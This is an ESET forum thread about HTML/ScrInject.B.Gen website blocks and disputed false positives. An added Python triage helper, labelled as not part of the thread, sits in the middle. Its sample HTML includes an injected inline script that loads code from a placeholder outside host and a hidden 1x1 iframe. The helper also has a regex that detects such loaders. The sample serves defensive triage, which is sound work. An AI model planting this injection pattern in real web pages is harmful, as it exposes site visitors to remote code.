
HTML/Scrinject.B.Gen virus false positive?


RPaxman


I am getting the message that I have been infected with the HTML/Scrinject.B.Gen virus. The timing of the infection coincides with a visit to a forum - ScrapGirls.net. 

 

I have talked to the owner of the company and she insists that this is a false positive that only ESET is giving. She has contacted her support team and they swear that they can't find it. They believe that they are not responsible. They claim that they cannot talk to ESET about why this is happening and that I need to contact ESET instead because they don't get blocked by other anti-virus software when they try to visit the forum.

 

(ESET blocks me from visiting the forum and has blocked me from it for months. I only got there yesterday by forcing my way through.)

 

ESET keeps reporting to me that it is unable to clean the virus files. I ran Malwarebytes last night and it didn't find the infection.

 

What should I do? Is this a real infection or a false positive? 

 

I'll appreciate your input very much.

 

 

[screenshot attached]


  • Administrators

The website in question was blocked about 3 months ago due to a Java exploit. I've checked it now and the website seems to be clean, hence it can be removed from the blacklist.


  • 4 months later...

On the night of Tuesday 01 April 2014 (this is NOT an April fool test), when I was trying to download a financial document from New World Investor, NOD32 v7.0.302.26 (which I have been using almost since it first came out) blocked the attempt, with the statement
"Access to the web page was blocked.  Show URL
"[hxxp://newworldinvestor.com/access-for-members-only]
"The web page is on the list of websites with potentially dangerous content.
"Open ESET KnowledgeBase  |  www.eset.com"

 

In response to that block, I received a request from ESET Nod32 for more information, and I did my best to reply, but several of the questions were much too vague to answer.  Unfortunately, I didn't keep a list of the questions and my attempts to respond.  But I did get a message that I would be contacted by email.  So far, that hasn't happened.
 

This blockage was the first time that ESET has claimed to me that New World Investor was an evil website.

 

Since I have been using Michael Murphy's New World Investor newsletter since May 2006, and have used his previous newsletters since September 1996, I was very surprised to read that ESET thinks that Michael Murphy is a malware source.

 

In order to download last week's NWI file (I was late), I had to switch from my Standard user account to an Administrator account, disable Eset NOD32, and then download the file.  After I enabled Eset NOD32 and had returned to my Standard user account, I could not find any problems in the downloaded file.

 

But just to be on the safe side, today I did a full InDepth scan of my entire laptop computer (all four partitions;  the last two are storage from previous laptops), and discovered that the alleged malware was the ScrInject.B.Gen virus.  The scan uncovered 70+ threats with that virus, all being New World Investor downloads, as early as 2009.  But it did not include yesterday's downloaded file (unless I missed it in the pile of 70+ threats), perhaps because I usually edit the NWI weekly download file, deleting material in which I was not interested, but I have not yet edited the file I downloaded yesterday.  So maybe my edits made the past documents (each almost certainly edited, because my edits include some minor formatting) look like they had a virus.

 

On the other hand, the last two sentences in my previous paragraph may be nonsense, because previous Eset NOD32 InDepth scans had never before seen a virus in my NWI downloads.

 

Today I also did a Google search for ScrInject.B.Gen, and discovered this thread.  And the Google search came up with a substantial quantity of other complaints about that Eset's faulty blockings.

 

But perhaps ESET's NOD32 is right to block ScrInject.B.Gen.  If so, has Michael Murphy's New World Investor website been captured?  Is the sender of his emails, nwiactive@aweber.com, a malware site?  [I went to www.aweber.com, and it sure looks legitimate.]

The Block's statement that "The web page is on the list of websites with potentially dangerous content" isn't very useful information for me, or anyone else who gets that message.  What list is Eset talking about?  One that Eset owns, or one owned by some third party?

Do I have to disable NOD32 every week when I want to read the latest New World Investor report (known as a Radar Report)?

PLEASE DO THE FOLLOWING:

1) Contact Michael Murphy at New World Investor and tell him that his paid customers can't access his website (unless they disable Eset, or other anti-virus software).

If NWI documents really are ScrInject.B.Gen malware carriers, help him fix the problem.  I can't tell him what is wrong (because I don't know what is wrong), but Eset can.

If NWI documents are not ScrInject.B.Gen malware carriers, tell him so, and if there is some way to prevent NWI documents from wrongly appearing to be ScrInject.B.Gen malware carriers, either fix it at Eset, or tell him how to fix it on his website.

 

2) Meanwhile, please tell me what I can do to safely access New World Investor.  FYI, my laptop is a Dell Precision M4700, running Windows7sp1, with all Windows Updates installed (except for kb2862330 which has a bad reputation).

R.N. (Roger Nils) Folsom
 

Edited by RNFolsom

  • Administrators

I was unable to reproduce the detection while visiting the forum mentioned in the initial post. Please submit all *.ndf and *.nqf files you'll find in subfolders of the c:\user folder to samples[at]eset.com along with a link to this thread.

Also I'd strongly recommend upgrading from v5 to v7 which provides better protection thanks to Advanced memory scanner.


Hey Marcos

 

When I enter the following "newworldinvestor.com/" into my browser, I am rejected from the site and unable to proceed. 3:37pm 4/4/14

67.222.24.163

The web page is on the list of websites with potentially dangerous content.


  • 2 weeks later...

Hi Marcos,

Our site is listed on ESET's blacklist.

I have stopped it and we are updating again. Please remove our website from your lists.

www.hotelvillazurich.com/


Hi Marcos,

Our site is listed on ESET's blacklist.

I have stopped it and we are updating again. Please remove our website from your lists.

hxxp://www.hotelvillazurich.com/

 

https://www.virustotal.com/sv/url/b5223b5b01331c9168e1d7aa7b4be1c7605670009cfa7ca6c795b6e69e98945a/analysis/1397836453/

Edited by SweX

  • Administrators

> Hi Marcos,
>
> Our site is listed on ESET's blacklist.
>
> I have stopped it and we are updating again. Please remove our website from your lists.
>
> www.hotelvillazurich.com

Please report the block to ESET as per the instructions here.


  • 2 weeks later...

Hi Marcos,

 

my small and simple website is being blocked by NOD32 for several days now:

[screenshot attached]

 

I scanned my URL with hxxp://www.scumware.org and it reports this:

2014-04-26 16:17:16	hxxp://parasite.kicks-######.org/wshots/	5A7687C5FB4C42DDBA25E5C1D30EDE9B	ESET	HTML/ScrInject.B.Gen virus

This is the VirusTotal report: https://www.virustotal.com/ru/url/3511e3688e66310bad220a0d39f13de8ec55e2c38ad2893193d27a83d11ecccc/analysis/1398657265/

(only ESET and its "friends" detect "something", but no one else).

 

I scanned the whole folder with NOD32 (with the most recent databases) and found ZERO threats:

[screenshot attached]

 

So does McAfee:

[screenshot attached]

 

I also checked the files manually for any modifications since they were uploaded (none found).

 

I have emailed the issue to samples@ (with a proper SUBJ "Whitelist domain parasite.kicks-######.org" and written BODY plus screenshot) several times and get zero response at all.

 

What can I do now? This ESET false positive makes my clients run away scared - and no one in ESET support cooperates!!! :(

 

Thanks,

Sasgisor

Edited by Sasgisor

  • Administrators

> I have emailed the issue to samples@ (with a proper SUBJ "Whitelist domain parasite.kicks-######.org" and written BODY plus screenshot) several times and get zero response at all.
>
> What can I do now? This ESET false positive makes my clients run away scared - and no one in ESET support cooperates!!!  :(

 

The domain is not blocked at the moment. Strange that there are "legit" domains with offensive 3-letter words in the name and show only a smile on the main page.

 

Last but not least, I'd like to ask everyone to create a separate topic for particular issues and to refrain from hijacking someone else's topics. Needless to say that this forum is not a means to report false positives or website blocks.


>The domain is not blocked at the moment

Yes, that was unblocked yesterday morning with the help of other ESET support staff. Thanks for the answer, anyway.

 

>Strange that there are "legit" domains with offensive 3-letter words in the name and show only a smile on the main page.

That website is a DynDNS'ed one (my home computer), and it serves several small projects within one domain name (in different folders). They are totally separated from each other, have different visitors etc. This is the reason I do not create the main page - there is nothing crosslinked among them all but the smile. :)


My response to Eset's decision earlier this year --- I discovered it on 01 April 2014 --- to block access to the New World Investor financial newsletter is in this thread's message #5, although there may be a few other responses elsewhere in this website.  (I have no idea how to find my own posts in this Eset Security Forum website.)  My response pointed out that I had been subscribing to Michael Murphy's New World Investor financial newsletter for many years, and I have used his earlier financial newsletters going back many, many years.  And although my response notes that Eset NOD32 scans of my computer "discovered" 70+ New World Investor newsletters with the HTML/Scrinject.B.Gen virus, more recent scans "discovered" the HTML/Scrinject.B.Gen virus in only 32 saved New World Investor newsletters, all downloaded and saved in 2009!

 

No one at Eset ever responded to my complaints, posted here and maybe elsewhere on this website.

 

So when I received a New World Investor email that a new financial report was available on the NWI website, to access the NWI website I had to exit my standard user account, open my Administrator account, temporarily disable Eset's NOD 32 v7.0.302.26, download the financial report, re-enable Eset's NOD 32 v7.0.302.26, and print and read the report (which typically are almost 20 pages in length).

 

Like other financial newsletters, Michael Murphy's New World Investor recommendations sometimes are bad ones.  Maybe someone unhappy with some of New World Investor's worse recommendations got access to the list of sites that Eset used to protect against genuine HTML/Scrinject.B.Gen virus websites, and in revenge added NWI to that list. 

 

But now I have good news:  A miracle happened.  As of last week, I now can access the New World Investor website, and download its newsletters, without disabling Eset's NOD 32 v7.0.302.26.  I do not know what caused that problem to get fixed.

 

I do have two guesses of causes of the miracle.  One is that someone at Eset finally discovered my posts (there weren't many) and acted to stop being frightened of New World Investor's website and financial reports.  The other is that one of the Wall Street Journal's financial columnists --- Mark Hulbert --- recently wrote a column that mentioned Michael Murphy's New World Investor (and also other financial newsletters), and someone at Eset reads the WSJ.

 

In any case, I sincerely thank whoever removed New World Investor from Eset's HTML/Scrinject.B.Gen virus list.  My use of Eset's NOD32 goes back to version 2.x and maybe earlier than that.  I really didn't want to have to give it up.

 

R.N. (Roger) Folsom

Edited by RNFolsom

  • Administrators

> No one at Eset ever responded to my complaints, posted here and maybe elsewhere on this website.

 

I've just searched for "newworldinvestor.com" on this forum and was able to find only your last post. Similarly I searched for the domain name in tickets from samples[at]eset.com but was able to find only one that we received on April 3, 2014 and a reply that the website still contained a malicious file was sent an hour later. Later we were contacted by Sucuri who cleaned the website and requested re-evaluation; the website was eventually unblocked more than a week ago.


Marcos:

 

I never before heard of Sucuri, but I very much appreciate their cleaning up the New World Investor website.  And your statement that "the website was eventually unblocked more than a week ago" is consistent with my experience, since I now have been able to access New World Investor today and last week and the week before that.

 

I am sorry that you could not find my messages in early April inquiring why I could not access New World Investor.  The probable reason is that I didn't post them here.  On reflection, the instructions I received for responding to a blocked website were very confusing (I did not have nearly enough background to understand them, because I had never before had a blocked website), and I have no idea where I posted them.

 

My previous message mentioned that I have no idea how to find my posts on this website.  But in this case the reason apparently was that I posted them somewhere else, or emailed them as replies to the blocked website instructions.

 

I did save the contents of one of my messages, so here it is:

"R.N. Folsom's computer is a Dell Precision M4700 laptop, running Windows7 sp1.
"You request registry data, and I would be comfortable doing that, but I have absolutely no idea what registry data you want.
"You also request that I send standard information, without a clue about what you mean (other than the top line in this document)."

 

I don't know where I sent that message.  But I am sure that I did not get a response.

 

R.N. (Roger) Folsom

 

P.S. FYI, I have four Eset accounts:  On a Dell C840 and on an IBM-A31 laptop, each is still using WindowsXPsp3 and NOD32 5.x because they are en route to being replaced.  But almost all of my computing has been done since early 2013 on my current 64-bit Dell Precision M4700 laptop, running Win7sp1, and NOD32 v7.0.302.26.  The fourth account will be used on my wife's new Lenovo ThinkPad T530 Laptop with Win7sp1 (and NOD32 v7.0.302.26), as soon as I can get the time to set it up.
 

Edited by RNFolsom

  • 1 month later...

I am unable to access pages on hxxp://downtraining.net because of the virus HTML/ScrInject.B.Gen. Is it still on the infected list?


  • 3 weeks later...

Hi I just discovered HTML/ScrInject.B.Gen -

 

One of my favorite websites (Which I visit regularly) : htt p:// www.webcam-hd.fr/en/

Is no longer accessible; ESET blocks it now - I get the pop-up window warning for HTML/ScrInject.B.Gen.

I also contacted the website (through their facebook page) and they of course insist that it's my computer that is infected, not their website.

 

But this seems illogical to me.

I can't access the site because ESET is preventing the access to an infected site; not the other way around - right?

Can somebody confirm this for me?


Yes it is blocked. Immediately after visiting the site, the index was sent to ESET for analysis automatically through the software.


  • Administrators

> Hi I just discovered HTML/ScrInject.B.Gen -
>
> One of my favorite websites (Which I visit regularly) Is no longer accessible; ESET blocks it now - I get the pop-up window warning for HTML/ScrInject.B.Gen.
>
> I also contacted the website (through their facebook page) and they of course insist that it's my computer that is infected, not their website.

 

The web page loads an external script loaded from a highly suspicious server. Please notify the website owner and ask him or her to fix it.


  • 3 weeks later...

Hello,

My ESET started warning me about ScrInject.B.Gen on my own website (wordpress). I have checked my website for threats and resolved any possible problems but ESET still won't allow me to visit it.

How do I find the source of the problem?

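The administrator's reply above explains what the ScrInject detection usually flags: a page that pulls in an external script from a server the site owner did not put there. The WordPress owner's question, "How do I find the source of the problem?", comes down to enumerating which third-party hosts the page's HTML actually loads script from. The following triage helper is an added example, not code from this thread, from ESET or from any of the sites mentioned; it assumes the site owner has the raw HTML of the page (downloaded or taken from the web server) and the page's own URL. The sample HTML and the hostnames in it are constructed for the example.

```python
"""Triage helper (added example, not from the thread): list every external
script/iframe source a page pulls in, plus inline scripts that create such
tags at run time. The site owner then checks each listed host against what
they actually installed; anything unrecognised is where to look."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse
import re


class ScriptSourceCollector(HTMLParser):
    """Collect src attributes of <script>/<iframe> and bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.sources = []          # (tag, raw src) for script/iframe with a src
        self.inline_scripts = []   # text of <script> blocks without a src
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("script", "iframe"):
            src = attrs.get("src")
            if src:
                self.sources.append((tag, src))
            elif tag == "script":
                self._in_script = True
                self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline_scripts.append("".join(self._buf))

    def handle_data(self, data):
        # html.parser delivers <script> bodies through handle_data
        if self._in_script:
            self._buf.append(data)


# Inline-script idioms that build a script/iframe tag at run time; a match
# only means "read this block", not "this is malicious".
DYNAMIC_LOADER = re.compile(
    r"document\.write\s*\(|\.src\s*=|createElement\s*\(\s*['\"](?:script|iframe)",
    re.IGNORECASE,
)


def find_external_sources(html, page_url):
    """Return (external, dynamic): script/iframe sources whose host is not the
    page's own host, and inline scripts that look like dynamic loaders."""
    site_host = urlparse(page_url).hostname
    parser = ScriptSourceCollector()
    parser.feed(html)
    parser.close()
    external = []
    for tag, src in parser.sources:
        absolute = urljoin(page_url, src)        # resolve relative paths
        host = urlparse(absolute).hostname
        if host and host != site_host:           # exact host match = first party
            external.append((tag, absolute))
    dynamic = [s.strip() for s in parser.inline_scripts if DYNAMIC_LOADER.search(s)]
    return external, dynamic


def external_hosts(external):
    """Distinct third-party hosts, sorted, for a quick review list."""
    return sorted({urlparse(url).hostname for _, url in external})


# Constructed sample page (hostnames are placeholders, not real sites).
SAMPLE_HTML = """<html><head>
<script src="/wp-includes/js/jquery.js"></script>
<script src="https://cdn.example.com/lib.js"></script>
</head><body>
<p>Hello</p>
<script>
var s=document.createElement('script');s.src='http://unknown-third-party.test/x.js';
document.body.appendChild(s);
</script>
<iframe src="http://unknown-third-party.test/frame.html" width="1" height="1"></iframe>
</body></html>"""
SAMPLE_URL = "http://www.example.org/"   # placeholder for the site's own URL

if __name__ == "__main__":
    ext, dyn = find_external_sources(SAMPLE_HTML, SAMPLE_URL)
    print("External script/iframe sources:")
    for tag, url in ext:
        print(f"  <{tag}> {url}")
    print("Third-party hosts to verify:", ", ".join(external_hosts(ext)))
    print("Inline scripts that load code dynamically:")
    for snippet in dyn:
        print("  " + snippet.replace("\n", " "))
```

Run it against a saved copy of the blocked page; every host in the "to verify" list should be one the owner recognises (their own CDN, an analytics provider they signed up for, a plugin's documented endpoint). The example compares hostnames exactly, so a site that serves assets from its own subdomain will see that subdomain listed too; that is deliberate, since a reviewer should confirm it rather than have the tool assume it.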

> Hello,
>
> My ESET started warning me about ScrInject.B.Gen on my own website (wordpress). I have checked my website for threats and resolved any possible problems but ESET still won't allow me to visit it.
>
> How do I find the source of the problem?

Hello,

 

It's OK to post a link (non-clickable) to the website.


 

> Hello,
>
> My ESET started warning me about ScrInject.B.Gen on my own website (wordpress). I have checked my website for threats and resolved any possible problems but ESET still won't allow me to visit it.
>
> How do I find the source of the problem?

> Hello,
>
> It's OK to post a link (non-clickable) to the website.

 

Excuse me for that!

Here it is: www.cavalier-noir.org


This topic is now closed to further replies.